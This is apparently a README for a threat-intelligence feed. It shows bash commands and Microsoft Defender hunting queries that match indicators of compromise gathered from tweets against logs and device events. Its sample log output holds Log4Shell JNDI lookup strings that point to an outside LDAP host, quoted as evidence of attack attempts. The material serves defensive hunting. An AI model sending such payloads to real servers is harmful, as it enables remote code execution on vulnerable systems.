Hunt

Hunt IOCs in different environments

Bash commands

Some bash commands to get IOCs directly from Tweets.

1. Get raw IOCs by type (url / domain / ip / sha256 / md5)

Command:

curl -s {CSV feed} | awk -F, '$3 == "{type}"' | cut -d, -f4 > {Output File}

Command example - getting suspicious URLs from today:

curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "url"' | cut -d, -f4 > suspicious_urls.dat

Output example:

url1
url1
url3
url4
...

2. Get raw IOCs by tag (phishing / malware / CobaltStrike / Log4Shell / ...)

Command:

curl -s {CSV feed} | awk -F, 'tolower($5) ~ "{tag}"' | cut -d, -f4 > {Output File}

Command example - getting all IOCs related to CobaltStrike from today:

curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, 'tolower($5) ~ "CobaltStrike"' | cut -d, -f4 > iocs_CS.dat

Output example:

url
md5
ip
ip
ip
url
domain
md5
sha256
...

3. Search IOCs in a file (e.g. log files)

Command:

curl -s {CSV feed} | awk -F, '$3 == "{type}"' | cut -d, -f4 | while read line; do grep "$line" {File};done

Command example - searching IPs related to #Log4Shell vulnerability on Apache logs:

curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "ip" && $5 ~ "log4"' | cut -d, -f4 | while read line; do grep "$line" /var/log/apache2/access.log;done

Output example:

170.210.45.163 - - [16/Dec/2021:21:13:00 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 589 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:21:13:01 +0000] "GET / HTTP/1.1" 301 509 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
170.210.45.163 - - [17/Dec/2021:01:48:06 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 5228 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [17/Dec/2021:01:48:07 +0000] "GET / HTTP/1.1" 301 5228 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"

Microsoft Defender for Endpoint (MDE) More info

Just examples, modify them as you wish.

let MaxAge = ago(30d);
let domain_whitelist = pack_array(
'XXX' // Some URL/Domain you want to whitelist.
);
let TweetFeed = materialize (
    (externaldata(report:string)
    [@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
    with (format = "txt"))
    | extend report = parse_csv(report)
    | extend Type = tostring(report[2])
    | where Type in('url','domain')
    | extend RemoteUrl = tostring(report[3])
    | where RemoteUrl !in(domain_whitelist)
    | extend Tag = tostring(report[4])
    | extend Tweet = tostring(report[5])
    | project RemoteUrl, Tag, Tweet 
);
union (
TweetFeed
    | join (
        DeviceNetworkEvents
    | where Timestamp > MaxAge
    ) on RemoteUrl
) | project Timestamp, DeviceName, RemoteUrl, Tag, Tweet

let MaxAge = ago(30d);
let IPaddress_whitelist = pack_array(
'XXX' // Some IP address you want to whitelist.
);
let TweetFeed = materialize (
    (externaldata(report:string)
    [@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
    with (format = "txt"))
    | extend report = parse_csv(report)
    | extend Type = tostring(report[2])
    | where Type == 'ip'
    | extend RemoteIP = tostring(report[3])
    | where RemoteIP !in(IPaddress_whitelist)
    | where not(ipv4_is_private(TweetFeedIP))
    | extend Tag = tostring(report[4])
    | extend Tweet = tostring(report[5])
    | project RemoteIP, Tag, Tweet 
);
union (
TweetFeed
    | join (
        DeviceNetworkEvents
    | where Timestamp > MaxAge
    ) on RemoteIP
) | project Timestamp, DeviceName, RemoteIP, Tag, Tweet

let MaxAge = ago(30d);
let SHA256_whitelist = pack_array(
'XXX' // Some SHA256 hash to whitelist.
);
let TweetFeed = materialize (
    (externaldata(report:string)
    [@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
    with (format = "txt"))
    | extend report = parse_csv(report)
    | extend Type = tostring(report[2])
    | where Type == 'sha256'
    | extend SHA256 = tostring(report[3])
    | where SHA256 !in(SHA256_whitelist)
    | extend Tag = tostring(report[4])
    | extend Tweet = tostring(report[5])
    | project SHA256, Tag, Tweet 
);
union (
    TweetFeed
    | join (
        DeviceProcessEvents
        | where Timestamp > MaxAge
    ) on SHA256
), (
    TweetFeed
    | join (
        DeviceFileEvents
        | where Timestamp > MaxAge
    ) on SHA256
), ( 
    TweetFeed
    | join (
        DeviceImageLoadEvents
        | where Timestamp > MaxAge
    ) on SHA256
) | project Timestamp, DeviceName, FileName, FolderPath, SHA256, Tag, Tweet

let MaxAge = ago(30d);
let MD5_whitelist = pack_array(
'XXX' // Some MD5 hash to whitelist.
);
let TweetFeed = materialize (
    (externaldata(report:string)
    [@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
    with (format = "txt"))
    | extend report = parse_csv(report)
    | extend Type = tostring(report[2])
    | where Type == 'md5'
    | extend MD5 = tostring(report[3])
    | where MD5 !in(MD5_whitelist)
    | extend Tag = tostring(report[4])
    | extend Tweet = tostring(report[5])
    | project MD5, Tag, Tweet 
);
union (
    TweetFeed
    | join (
        DeviceProcessEvents
        | where Timestamp > MaxAge
    ) on MD5
), (
    TweetFeed
    | join (
        DeviceFileEvents
        | where Timestamp > MaxAge
    ) on MD5
), ( 
    TweetFeed
    | join (
        DeviceImageLoadEvents
        | where Timestamp > MaxAge
    ) on MD5
) | project Timestamp, DeviceName, FileName, FolderPath, MD5, Tag, Tweet